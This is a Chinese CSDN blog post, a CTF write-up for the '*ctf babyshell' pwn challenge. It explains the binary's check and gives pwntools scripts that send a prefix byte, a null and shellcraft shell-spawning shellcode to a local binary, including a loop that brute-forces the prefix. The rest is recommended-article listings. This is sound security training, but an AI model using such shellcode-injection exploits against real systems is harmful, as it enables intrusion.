最简单的*ctf-PWN

最新推荐文章于 2021-09-08 16:54:30 发布
最新推荐文章于 2021-09-08 16:54:30 发布
阅读量771 收藏 3
点赞数 2
分类专栏: 任务
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44319142/article/details/89742742
版权

babyshell

给的提示是 a easy shellcode
所以可以思考就是要写入shellcode
来看一下ida里面的情况
在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

根据逻辑,只要让函数return 1,这样的话指针指向buf,buf里面写shellcode就会正常执行了

所以,这里要先进循环,然后截断使他可以return 1,然后下面写shellcode
这里用什么字符让他进入循环,并且可以使shellcode被正常执行,这是需要思考的

from pwn import *
context(os='linux', arch='amd64', log_level='debug')
p = process("./shellcode")
p.recvuntil("plz:\n")
pay='s\x00'+asm(shellcraft.sh())
p.sendline(pay)
p.interactive()

pay='s\x00'+asm(shellcraft.sh())
核心语句在这里,这里用s是机器语言的原因,不同的字符写进去,机器语言结果会不太一样
也就是说碰巧用s就成功了,所以建议写个list,运行一下,一定可以getshell的

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述
可以看出来字符不一样,机器指令会不一样,这就会影响到能不能getshell

有列表的exp,跑一下,就可以出来

from pwn import *
import string
list = ['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z']

  
for x in list:  
  context(os='linux', arch='amd64', log_level='debug')
  p = process("./shellcode")
  p.recvuntil("plz:\n")
  pay = x + '\x00' + asm(shellcraft.sh())
  
  try:
    p.sendline(pay)
    p.interactive() 
  except:
    continue
Xuan~
关注
  • 2
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
一道pwn入门的练习题
10-23
直接以一个非常简单的栈溢出例子(基于Linux)来讲解pwn所要用到的一些常用的工具及命令的用例
pwn简单学习
m0_51974791的博客
07-14 291
简单的栈溢出 以ret2text题目为例 篡改栈帧上的返回地址为程序中已经有的后门函数 首先用cheksec查一下文件的一些基本信息: 是一个32位的文件,NX enabled开启就是意味着栈中数据没有执行权限。 拿IDA看一下函数: vulnerable()显然是一个有问题的函数跟进去 这里使用了gets指令来读入数据,buffer[8]很明显,向gets读大于8的数据就会溢出。 还发现该程序留有后门在程序中: 思路很明确了,要返回到get_shell这个函数就能获得交互界面。现在只需要确定
pwn 入门基础
y0un9er
08-10 3475
简单介绍入门 pwn 所需要的基础知识,如:汇编、函数调用约定、常用工具等
CTF简单的Web题
weixin_34167043的博客
06-21 1080
http://www.shiyanbar.com/ctf/1810 天网管理系统天网你敢来挑战嘛格式:ctf{ }解题链接: http://ctf5.shiyanbar.com/10/web1 查看源代码发现提示<!--$test=$_GET['username'];$test=md5($test);if($test=='0')--> md5($test) = ‘...
简单ctf 我们是正规网站,所有文件都是有备份的好吗
qq_22806091的博客
09-08 159
题目: 我们是正规网站,所有文件都是有备份的好吗 一个简单ctf http://106.52.39.144/ 对于web题目来说首先去查看网页代码 Ctr + u 查看 可以看到有提示 zd.txt 这时候我们应该可以想到这是一个目录 将进入zd.txt目录可以看到开头就给出了一个flag 由于这个题目有两个flag,所以我们继续往下看 提示说他给的是一个字典目录所以我们试试进入所有的目录查看 但是目录有点多 所以我选择使用目录扫描工具DirBuster进行查看 放
ctf题库ctf-pwn赛题收集
03-31
ctf题库 CTF(夺旗赛)题库是一个由安全专家和爱好者们制作的一系列网络安全挑战。这些挑战旨在测试各种安全技能,包括密码学、逆向工程、漏洞利用和网络分析等。 CTF题库通常由多个类别的挑战组成,例如Web安全、二...
CTF-Pwn-[BJDCTF 2nd]rci
01-09
CTF-Pwn-[BJDCTF 2nd]rci 博客说明 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! CTP平台 网址 ...
0ctf-2017-pwn-char
02-05
2017年0ctfpwn题,题目质量还是非常高的,要求做题人需要扎实的shellcode编写能力和ROP链构造能力,下面给出wp链接:https://blog.csdn.net/A951860555/article/details/113666423
CTF-misc工具2-CTF-Tools-masterV1.3.7
最新发布
08-17
该工具主要适用于参加CTF竞赛的选手,以及对密码编码算法感兴趣的信息安全从业人员。 使用场景: 在CTF竞赛中,可利用该工具自动识别编码类型并解码,快速解决misc类别的密码题目。 其他说明: 该工具具备智能判断密码...
pwn-environment:使用docker的ctf-pwn环境
05-11
环境 使用docker的ctf-pwn环境
攻防世界_pwn_getshell(萌新版)
TedLau的博客
02-24 835
首发于鄙人博客:传送门 0x00 前言 无需多言,看图 :) 0x11 步骤
CTF_论剑场 pwn3
W3rsn
04-16 289
先把附件下载下来,然后checksec checksec pwn3 然后IDA64打开 read函数存在栈溢出,然后重新里还有一个getshell函数。所以控制程序运行流程使它跳转到getshell函数就可以得到flag from pwn import * context(arch="amd64", os="linux") p = remote("114.116.54.89",...
堆溢出
weixin_44319142的博客
04-23 3106
原理 堆溢出是指程序向某个堆块中写入的字节数超过了堆块本身可使用的字节数(之所以是可使用而不是用户申请的字节数,是因为堆管理器会对用户所申请的字节数进行调整,这也导致可利用的字节数都不小于用户申请的字节数),因而导致了数据溢出,并覆盖到物理相邻的高地址的下一个堆块。 不难发现,堆溢出漏洞发生的基本前提是 1、程序向堆上写入数据。 2、写入的数据大小没有被良好地控制。 思路主要是 1、覆盖与其物...
攻防世界——pwn(1)
weixin_44319142的博客
04-08 2847
get_shell
泄漏地址总结(Dynelf & LibcSearcher)
weixin_44319142的博客
04-16 2580
Dynelf泄漏modeul 32位 p = process('./xxx') def leak(address): #address指要泄露的地址 #各种预处理 payload = "xxxxxxxx" + address + "xxxxxxxx" p.send(payload) #各种处理 data = p.recv(4) log.debug("%#x => %...
攻防世界萌新入门(1)
weixin_44319142的博客
04-07 2454
cgpwn2 首先查看一下 开心的萌新题目,只开了nx嘻嘻嘻嘻嘻嘻嘻 只有hello()函数需要看看 程序里边儿就有system函数可以直接调用哈哈哈哈 不过没有“/bin/sh”的字符串,所以要写进去,要写到bss,怎么写呢,我记得原来只用过read,这里有fgets,点进去看到name是一个全局变量,在bss 利用这个把/bin/sh写进去,然后,利用gets函数覆盖返回地址到syst...
Pwn题——canary
weixin_44319142的博客
04-03 1757
canary 嘤嘤,不仅NX打开了,栈里面还有canary,这是什么鬼。。。。。 Canary保护机制的原理,是在一个函数入口处从fs段内获取一个随机值,一般存到EBP - 0x4(32位)或RBP - 0x8(64位)的位置。如果攻击者利用栈溢出修改到了这个值,导致该值与存入的值不一致,__stack_chk_fail函数将抛出异常并退出程序。Canary最高字节一般是\x00,防止由于其他...
任务三 Pwn100任务
weixin_44319142的博客
02-04 1466
gdb https://blog.csdn.net/zdy0_2004/article/details/80102076 内容很详细 编译带调试信息的可执行程序:用gcc(g++)编译的时候带上-g选项即可 启动GDB开始调试 (1)gdb program ///最常用的用gdb启动程序,开始调试的方式 (2)gdb program core ///用gdb...
pwn学习任务(二)
weixin_44319142的博客
12-31 1391
PWN学习任务(二) Python字符串处理 zio库用法 pwntools库用法 学习使用socat开端口运行程序 掌握ida远程调试方法 pwn题目远程调试的运行 Python字符串处理 撤销:Ctrl/Command + Z 重做:Ctrl/Command + Y 加粗:Ctrl/Command + B 斜体:Ctrl/Command + I 标题:Ctrl/Command + Shif...
ctf 简单pwn题资源
08-09
CTF 简单 PWN 题资源是指为了让参与网络攻防竞赛的选手提高他们在 PWN 领域的技能而准备的一些简单题目。这些题目通常要求选手对二进制代码进行逆向工程、利用漏洞并实施攻击,以获取题目提供的关键信息或获取系统...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值